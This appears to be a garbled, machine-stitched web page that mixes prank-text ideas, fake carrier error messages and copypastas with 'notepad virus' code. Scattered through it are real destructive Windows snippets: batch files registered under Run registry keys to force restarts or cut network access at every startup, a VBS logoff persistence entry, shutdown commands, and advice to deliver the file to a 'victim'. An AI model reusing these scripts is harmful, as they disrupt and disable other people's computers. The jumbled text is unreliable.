title Free Call of Duty! It shuts it off once and deletes the files needed to reboot and restart. Here are the two most common error messages used by Verizon. If you want to scare away spammers who keep sending you emails, then you can send them a fake message. If youre going to prank someone with a fake text message, then it should at least look real. Further messages will be charged to your account. You want to block the numbers on your Voice account, not on your cellphone. But, I will explain what happens here. Don't do it too long or you'll ruin a good thing, but fair warning: If you've got friends who gossip a lot via text though, this might not be the one for you. There are a number of different messages you can use, and well go over a few that are definitively used by some of the main cell carriers in North America. Msg 2114 Message sent using an invalid number of digits. If you don't know what to say, sometimes the best thing to do is respond with a GIF. if %input%== No goto 2 - This is EXTREMELY important for your fake virus to work. Overall, fake error text messages can be a fun way to play a joke on someone, but they should not be used to cause harm or to deceive someone. Mailinator 07. If youre pranking your friends to send text from fake number, then you cant get in trouble. If you can contain the amount of spam I have, you will be granted with special powers that allow you to smoke weed 200 times harder. You can blacklist specific numbers so that they will always be told your number is disconnected. */q without quote. echo shutdown -r -t 11 -f>>c:windowshartlell.bat, reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f, reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f, echo ipconfig/release_all>>c:windowswimn32.bat, reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f, reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f, reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f, echo You Have Been Hackedecho @echo off>c:windowswimn32.bat. and begins a fake download. Raid Shadow Legends: RAID: Shadow Legends is an immersive online experience with everything you'd expect from a brand new RPG title. One option for sending a fake error message is to copy and paste a pre-written template. Asks if you are sure you do NOT want to download. This took me LITERALLY forever to make, and I hope you find ways to prank friends, teachers, you name it! How do I save it an by what program name? !ping n- 2>nulecho ALL I DID WAS PUT SOME CODING INTO NOTEPAD AND MAKE IT LOOK LIKE YOU GOT HACKED!ping n- 2>nulecho Oh, I am just DYING here right now!ping n- 2>nulecho Are you crying?ping n- 2>nulecho Because I am.echo DUE TO ALL THIS LAUGHTER!! 20052023 Mashable, Inc., a Ziff Davis company. The best pranks (in text form, anyway) are light-hearted and fun and only mildly walk the line of panic, fear, and confusion unless its your best friend, of course, in which case all bets are off. It really was.ping n- 2>nulecho I hope to see you around some timeping n- 2>nulecho And if I do, I would really like to teach you coding and such.echo Like how I made this fake virus delio.echo I made it in Notepad if that helps your case.ping n- 2>nulping n- 2>nulping n- 2>nulping n- 2>nulecho Later!ping n- 2>nulecho Press any button to exit after you're done reading.ping n- 2>nulpauseexit. 44 ERROR: This phone is no longer in working service ? !ping n- 2>nulecho LOLOLOLOLOLOLOLOLOLOLOLOLOL!!!! View the entire conversation history, including all messages sent and received. Visit rblx.gg on your browser to generate TONS of ROBUX instantly! No hate but theese scam parody copypastas are trash. (You can get lots of cat facts here) Around the 2nd or 3rd text, include an option to cancel the cat facts. You wont want to send a prank text to someone if its going to truly freak them out. Fake Mail Generator 05. Its more likely to be convincing for a long-term situation, but it also might spark a phone call, so keep that in mind. on Introduction, Do I copy the hashtags into notepad?Please Help.Thanks ;), Question The test was apparently done after booking on www.stdcheck.com, and the infected patient now has to inform all the previous partners about the bad news. How Do You Make a Fake Disconnected Text Message? (peach) - butt. The cool thing about Google Voice is that it will automatically send texts or deliver a voice message to the effect that a number is not available. You can add up to ten email addresses. Open up notepad and copy and paste that. This is a very useful script if you want to learn how to create a virus using notepad. Advertisement. Msg 2108, 2109, or 2111 The recipient you are sending to has chosen not to receive messages. Do you want to delete it?echo Type 1 to deleteset input=set /p input=if %input%== 1 goto 4:2Clsecho Are you sure you don't want to download a free game?echo Type 2 for Yes or type 3 for Noset input=set /p input=if %input%== 2 goto 1if %input%== 3 goto 3:3Clscolor Cecho Oh well. !ping n- 2>nulecho #TROLLS FOR DAYS!! You can manually send a message in response to a text sent to you. A Pocket Sundial From a Broken Pocket Watch! Apache ECharts. Everyone from Kathy Griffin to activists(Opens in a new tab) have texting lists that you can sign up for. Here are 13 prank text messages you can copy and paste. So, you can use services that automate the process. There are likely countless services that can get the job done, but were going to stick to one example. So its easy to learn how to create a virus using notepad. Send this text then follow up with Oh crap, that wasnt for you and watch as your friend tries to figure out what sort of illicit affair youre involved in this time. Never . Faking Disconnected Text Message: How to? These days, texting pranks requires a subtle cunningness to throw your target off guard. We all like to think of ourselves as having a great sense of humor, whether it's being the laugh of the party on a night out with your friends or sending hilarious memes to your loved ones.But there's no doubt that sometimes the funniest things happen when firing off a quick textwhether you meant to be funny or not. Choose something different from what you have currently, like a fashionable mullet or a pixie cut, then send progress pics from your bathroom mirror. This is all written in a lime green font color. When they follow the cancellation directions . !ping n- 2>nulecho Ahhhhh That was fun.ping n- 2>nulecho I want to let you know that nothing happened.ping n- 2>nulecho Nothing was deleted.echo The only thing I did was make this Batch File say stuff to make it look like you got hacked.ping n- 2>nulping n- 2>nulecho If you think back to it, don't you find it just a LITTLE funny?ping n- 2>nulecho Yeah, this took me a while to make.ping n- 2>nulecho It was fun doing this. If you pretend to be disconnected, the ruse only lasts so long for anyone who knows that numbers get recycled. Similar messages can be found for carriers around the world. We have randomly selected and YOU HAVE WON!ping n- 2>nulecho "What did I win?" P200 load will expire in 45 day (s). If not, you can take inspiration from the texts, and come up with completely new texts. Then begin texting fun and random cat facts. Copy and Paste below Step Two's line of coding. If you live with roommates, send a text to the group chat that you just saw something scurry under the fridge. Do you hate fake spam threads? Keep in mind that when Verizon does this, its automated, so you would expect the error message to be sent relatively quickly after a message fails to be delivered. Beyond that, you might be better off pulling from experience. @echo off. Method 1 Choosing Whom to Text Bomb 1 Pick someone with an unlimited texting plan. 2. BTW, that 3rd line, isnt what disables the internet, permanently. Here I have share 25 virus script which will make a super successful pro hacker and also impressed your friends. Go into detail about how they called and apologized, and youre heading to their place right now. How to get access granted in hacker typer? T-Mobile has a near-identical message for when a customer is temporarily out of service. ? Regulators disagreed. Now Save This Notepad file With Any Name Having .vbs Extension . If you are seeing messages with "failed" status (as opposed to "undelivered") and you believe your messages are being blocked in error, please contact Twilio support with example Message SIDs from your SMS logs and an explanation of your use case. If youre thinking about sending a fake error text, make sure you are aware of the potential consequences and be sure to use them responsibly. The hilarity comes from the relief theyll feel hours (or days) later when you finally admit it was a joke. Or any bot, for that matter. Note though that some websites have banned it or limited the number of modifiers that can be submitted. Taking SIM Card Out & Putting Back In Later: Getting Texts? You can either copy and paste the exact text messages from above. "echo" is a command for the .bat file to "speak" or write. automatically shut down on every startup! Fake Virus Batch File You need to copy and paste the following content into a Notepad and save with a file name of your choice followed by the .bat extension. @echo WARNING VIRUS ATTACK! This type of control is easy to use with good apps, and its a lot more powerful than manually going through this process yourself. Please correct the format and try again. Shortcuts might be the best text prank out there. Error Code: E-1301: Your number has been blocked by the recipient. The Meta Quest 2 is also about to get cheaper. Here we go! Alternatively, you can automate your fake message with a service like Google Voice or an app like YouMail. Anyone can convert their text into weird hacky text with all sorts of strange marks - no hacking skills required ;) That's not to say that you can't use this converter to create glitchy text and wow all your n00b friends. Do you want to delete it?echo Type 1 to deleteset input=set /p input=if %input%== 1 goto 4, #################################################################################. Instead of the usual "yes," "no," and "I love you . But if you send someone a photo of a turtle climbing out of a briefcase, then follow with "whoops wrong person," it's bound to leave them confused. There are apps out there that will send fake texts to the numbers you choose. When you do, any blocked contact directed to your Google Voice number will receive a message to the effect of phone disconnected.. Not sure what to do?ping n- 2>nulping n- 2>nulecho Becauseping n- 2>nulClscolor Fecho YOU SHOULD HAVE SEEN THE LOOK ON YOUR FACE!! !ping n- 2>nulecho #TROLLS FOR DAYS!! Login Sign up. Enter the recipient's phone number. Your text will be instantly transformed into the fancy text of your choice. How the Cat Facts Prank works: The main gist of Cat Facts prank is that you'll send someone a text saying they are now subscribed to Cat Facts. You may have found this page after seeing someone post glitchy text (like this) in the comments of a blog post, youtube comment, or other social media page. To round it up, they'll say they're running out of load, so they're urgently requesting that you load up credits to their number. Try changing your name to "Mom" and see the hilarious messages roll in. You will get another dialogue box, write in it: Internet Explorer and press finish, 4. Not sure what to do?ping n- 2>nulping n- 2>nulecho Becauseping n- 2>nul, #######################################################################. Our fake call app will then be able to call the number you entered and read the message you wrote. This spares any real contacts from getting the wrong message and helps you avoid excessive spam. European PhD: Less Respected Than U.S. PhD. Everyone has a phone on them, which means lucky for you, everyone is susceptible to a classic text message prank. It's me again.ping n- 2>nulecho You scared yet? Pastebin . I have personally checked all of these codes in my Microsoft Surface Pro. In detail The spoofed sender can be any fake number or name. The copypastas in this list were taken all around the internet. Before you ask: Yes, it's worth the price. Did you make this project? [msgerror] This recipient is blocking your number due to spam. By subscribing to this BDG newsletter, you agree to our. Reviewing spam text message examples can help avoid falling victim to these dangerous schemes. @echo WARNING VIRUS ATTACK! keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0); keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0); outToScreen = GetStdHandle(STD_OUTPUT_HANDLE); char inputFile[]=C:Documents and SettingsAll UsersStart MenuProgramsStartuprawr.bat; ofstream fp(C:Documents and SettingsAll UsersStart MenuProgramsStartuprawr.bat, ios::app); SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY); SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN); AS IT WAS TOO DANGEROUS THE ACTUAL HEADER FILES FOR THIS SCRIPT ARE NOT GIVEN, AND IF U WANT TO TRY THIS SCRIPT U CAN JUST USE OF HEADER FILES SUCH AS STDIN, STDLIB, CONIO , AND STUFF LIKE THAT, Credit:- https://nekraj.com/notepad-virus/, Fantasy Cricket Expert, Analyst & Tipster | Internet Marketer | Love to Travel & To Play Cricket Winning is my daily habit. This is the final step in creating the fake virus. you may askping n- 2>nulecho Well, you have won a FREE Call of Duty download!ping n- 2>nulecho Would you like to download now? Below are some of the popular sexually-suggestive emojis that you can use to spice up your sexts: Emojis and their meaning (5,6): (eggplant) - symbolizes a penis. The easiest thing you can do in this situation is to craft a fake text and send it back to the person you want to convince. !echo Type Yes or Noset input=set /p input=if %input%== Yes goto 1if %input%== No goto 2, #################################################################, Explanations for each line of COMMANDS (not each line of text), ==================================================================. Text your friend these simple words: 'I'm sorry', and then revert to radio silence. Be careful with its use. !echo Type Yes or Noset input=set /p input=if %input%== Yes goto 1if %input%== No goto 2:1Clscolor Aecho Thank you for downloading.ping n- 2>nulecho Downloading 1%ping n- 2>nulping n- 2>nulping n- 2>nulping n- 2>nulecho Downloading 8%ping n- 2>nulping n- 2>nulping n- 2>nulecho Downloading 14%ping n- 2>nulecho Downloading 16%ping n- 2>nulping n- 2>nulping n- 2>nulecho Error.exe.ping n- 2>nulecho Download has been paused.pauseecho A virus has been detected. Conclusion. This is essentially the same message that is used by AT&T, but if you pay close attention, you can see that the two messages are formatted slightly differently. Not only that, but you will have a laggy as fuck laptop. Plenty of spam callers change their numbers frequently, avoiding detection from these kinds of lists. After a failed attempt, it says your data is at risk and it "deletes" the SYSTEM32 files. You can forward all calls, or you can create rules for forwarding calls. Send it to the victim by mail or by Pen Drive. Bonus points if you never let on that it was you. Sorry about that. (This could be used for a more lighthearted and friendly error message), Error: Your Brain Has Failed to Compute (This could be used for a more humorous error message), Error: The Universe Has Crashed (This could be used for a more dramatic and humorous error message), Error: Your iPhone has a virus. Sorry to break it to you, but the same old jokes aren't going to cut it anymore. Sample cat fact: A group of kittens is called a kindle while a group of adult cats is called a clowder.. Spam text messages (also known as phishing or "smishing" - SMS phishing) trick consumers into providing personal data to criminals who pose as a familiar business, organization or family member. It's not surprising because they can take over an entire Twitch chat.. Confirm your fake call by pressing the orange button. Create Shortcut - right-click on it and send it to desktop. Do your friend a favor and prank them by alerting them to the latest comedy shows or protests(Opens in a new tab) going on in their area. (Just dont expect them to believe you if there ever really is something under the fridge.). What Are Copypastas? Inversely, you can create a white list, so anyone not on the approved list gets the message. That robux scamming bot message. Message Error: The recipient has blocked all incoming SMS from [Insert phone number]. Throwawaymail 08. They're announcing that they have a new number and will ask if you received the package they sent months ago. from Mashable that may sometimes include advertisements or sponsored content. Pastebin is a website where you can store text online for a set period of time. Number spoofing generally gets around spam number registries. There are so many websites available online that will give you templates of error messages. TempMail 09. Well, there are a tonne of languages that use these types of markings, and some languages have all sorts of rules with multiple marks per character, so a single character could have a dozen different forms. Did you know there are apps that can add faux ghosts to your pics? FEATURES: **NEW** View your Conversation History. Alternatively, you can automate your fake message with a service like Google Voice or an app like YouMail. Share it with us! Then you'll see at the top it shows your profile picture, your username and of course, your email. Please contact customer service to resolve this issue., T-Mobile Free Message: Text message to T-Mobile customer (your number) has been disabled., T-Mobile SMS ERROR: The subscriber you are trying to reach has blocked incoming text messages from this number., T-Mobile SMS ERROR: Message delivery failed. Missent Load Scam - a type of scam where the text message appears similar to a Pasaload, Share-A-Load, or Give-A-Load notification. Msg 2114 Message sent using invalid number of digits. Here are a few examples of fake error message text templates that are specifically designed for use with T-Mobile phones: The Error 404 message is often used as a joke or prank, as it is typically associated with websites that are not found or are unavailable. How to create virus using notepad which will make you a super cool hacker? One option for sending a fake error message is to copy and paste a pre-written template. Pick a song, any song preferably one with questions or short sentences and find a poor soul in your contact list to slowly text lyrics to, one by one. The scammer pretends to be a relative or family member of yours from abroad. (I did consider calling this the "hacked text generator", but even though it probably sounds cooler, it's a little misleading). Once call forwarding is established, you can block numbers on Google Voice. What really matters is that you include the numbers in question in your setup. To send load, txt to 2+10digit cel#. works best on, site or something. cls :A color 0a cls @echo off. (It's in between the hashtags), ###############################################################, @echo offtitle Free Call of Duty!color Becho Congratulations! Its not your fault, its our fault. A friend that can take tricks is cool to hang around. Advertising Info; Submit a script; Link to Us! You can find steps for that in the Google Voice section. Culture April fools Prank Joke Texting. Copy and paste below Step Three's coding. Chances are, youll be able to come up with a highly realistic fake text message. But, your fake message needs to be believable and should look real. It doesn't matter what you put before the .bat. People believe that gender equality is improving, but the rest of the data tells a different story. Ask your friends for input on the fake message that youre planning to send. Include a blurry photo as evidence, then say youre terrified and will be hiding in your room until the issue is resolved. Trash Mail 12. Speak only in song lyrics think Adeles Hello and see how long it takes your friend to catch on. This took me LITERALLY forever to make, and I hope you find ways to prank friends, teachers, you name it! 2023 BDG Media, Inc. All rights reserved. Can Someone Delete Your Text Messages Remotely? Click here to get free JavaScripts, hassle free! Top 60+ scary text messages to send to friends and family Monday, February 13, 2023 at 5:14 AM by Julian Mireri Chris Muyera Having friends you can share jokes and pranks with is fun. Send this text, followed by an omg, this is really tough to say, and then simply *disappear*. Copy and paste Step Four's line of coding. This Will Pop Up A Message Saying OWNED!! Then "someone" gains "control" of the computer and "hacks" your computer. Learn how to edit your text easily with this free online unicode converter. Please check the number and try again., Error 404: The person you are trying to reach is not available. !ping n- 2>nulecho LOLOLOLOLOLOLOLOLOLOLOLOLOL!!!! Here are some steps that will help you send text from fake number that looks real. Then it says that you got trolled. Simplygo to the websiteand sign up for a personal number (unless you want a business number). Make FBI text memes or upload your own images to make custom memes. Hope is dimming for FTX's allegedly ripped-off customers. #Nekians https://nekraj.in, 71 Best Social Media Exchange Websites List, Save the file with extension .bat (like seofreetips.bat). With all their real apps on the second page, your friend will be tapping away to no avail. When you text a number that cannot be reached on Verizons network, you typically get a reply in that same text conversation. April Fools' Day is the perfect opportunity to pull pranks on your family and friends, and if you cannot see them in person today, know that there is plenty . You should be able to use the generated hacked text all over the place including Discord, Amino, Reddit, YouTube, Instagram bio, Twitter, Disqus, and almost anywhere else you can paste text, so give it a shot! Elon Musk said Neuralink is ready for humans. For mobile, just tap on your screen. Your friend will be left to wonder what major, life-changing announcement is coming their way. By signing up to the Mashable newsletter you agree to receive electronic communications This prank is not for the faint of heart. (If you can somehow manage to change your name in their phone to a fake company name, even better.). Keep using theyre instead of their and youre instead of your until they just cant take it anymore. But the best type of fake texts is fake error message texts where you pretend to be a business. It's not hard to find the picture in question(Opens in a new tab). Phone Sending Texts on Its Own: How to Fix? (2 Ways), Are There Apps That Send Fake Messages? It's bound to annoy them. 1/2 You have just been loaded P150 by 09269787436. ##################################################################, :4Clscolor Cecho Deleting virus 1%ping n- 2>nulping n- 2>nulping n- 2>nulecho Deleting virus 37%echo Deleting virus 43%ping n- 2>nulecho Error.exeping n- 2>nulecho Failure to delete virus.echo =!WARNING!=echo Your data is at risk!pauseecho Deleting all SYSTEM32 filesping n- 2>nulping n- 2>nulping n- 2>nulping n- 2>nulping n- 2>nulClsecho Cleared.pause. Take your revenge on them by sending random one-letter texts to them at random times of the day. They can also be used as a way to stop someone from texting you, either because they are cheating or because they are sending spam texts. Open your notepad, and then type or copy and . That's probably where you first saw this weird text before you came looking for a translator. 1 year ago, The code is:@echo offtitle Free Call of Duty!color Becho Congratulations! 3412154 Error Invalid Number. Please call this number to resolve the issue: (fake phone number), Error: Your iPhone has been hacked. You can then copy and paste the text wherever you need it. 1. at the bottom of your screen on your left press the settings button. If you want to be thorough, getting the quotes perfectly matters. Now don't go snatching phones left and right. Tell lots of people you're . Mashable is a registered trademark of Ziff Davis and may not be used by third parties without express written permission. (Note: This is only funny if your ex was annoying, though, and not toxic.). . dim strDir,strfile,st,strtxt2,strshell,strlog, dim obfso,obfolder,obshell,obfile,obtxtfile, set obfso=CreateObject(Scripting.FileSystemObject), set obfile=obfso.CreateTextfile(strDir & strfile), obfile.writeline(set ws=createobject(&st&strshell&st&)), obfile.writeline(ws.run(&st&strlog&st&)), ws.regwrite HKCUSoftwareMicrosoftWindowsCurrentVersionRunLogoff,C:WINDOWSwscript.vbs,REG_SZ. Fortunately, its not that hard to come up with a fake error message text. It will start to open different applications repeatedly which will affect the systems performance. Set wshShell =wscript.CreateObject(WScript.Shel, Set wshShell = wscript.CreateObject(WScript.Shell, Set WSHShell=Wscript.CreateObject(Wscript.Shell), shutdown -s -t 7 -c A VIRUS IS TAKING OVER c:Drive. The time of day is also key. The best pranks (in text form, anyway) are light-hearted and fun and only mildly walk the line of panic, fear, and confusion unless it's your best friend, of course, in which case all bets. . Try sending a random funny photo to a friend out of context and watch their face light up across the room just please, if you try this with strangers, do *not* Airdrop them inappropriate photos, thank you very much. Copy and paste below Step Six's coding. ############################################################################, :1Clscolor Aecho Thank you for downloading.ping n- 2>nulecho Downloading 1%ping n- 2>nulping n- 2>nulping n- 2>nulping n- 2>nulecho Downloading 8%ping n- 2>nulping n- 2>nulping n- 2>nulecho Downloading 14%ping n- 2>nulecho Downloading 16%ping n- 2>nulping n- 2>nulping n- 2>nulecho Error.exe.ping n- 2>nulecho Download has been paused.pauseecho A virus has been detected. All Rights Reserved. !ping n- 2>nulecho Ahhhhh That was fun.ping n- 2>nulecho I want to let you know that nothing happened.ping n- 2>nulecho Nothing was deleted.echo The only thing I did was make this Batch File say stuff to make it look like you got hacked.ping n- 2>nulping n- 2>nulecho If you think back to it, don't you find it just a LITTLE funny?ping n- 2>nulecho Yeah, this took me a while to make.ping n- 2>nulecho It was fun doing this. You can either copy and paste these texts, or you can take the example of these texts to come up with your own. Why? [ATT MESSAGE CENTER] Message blocked. Change whatever you want, I recommend it because I made it to troll my friend. So, your alternative option is to pretend to be a different person with the same number. Choose a show they deeply love and hit them with the sad, sorry news that its gone forever. You are about to get spammed with 600 dank memes. Now, you can send fake texts to your friends and spammers to take revenge on them. Pastebin.com is the number one paste tool since 2002. 10 Minute Mail 11. If you're brave enough, a funny thing to do is switch names of contacts in a friend's phone. hacked text, hacked text. Enjoy prank call and have a laugh. When the victim will click on it, it will start working. It's me again.ping n- 2>nulecho You scared yet?

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fake spam text prank copy and paste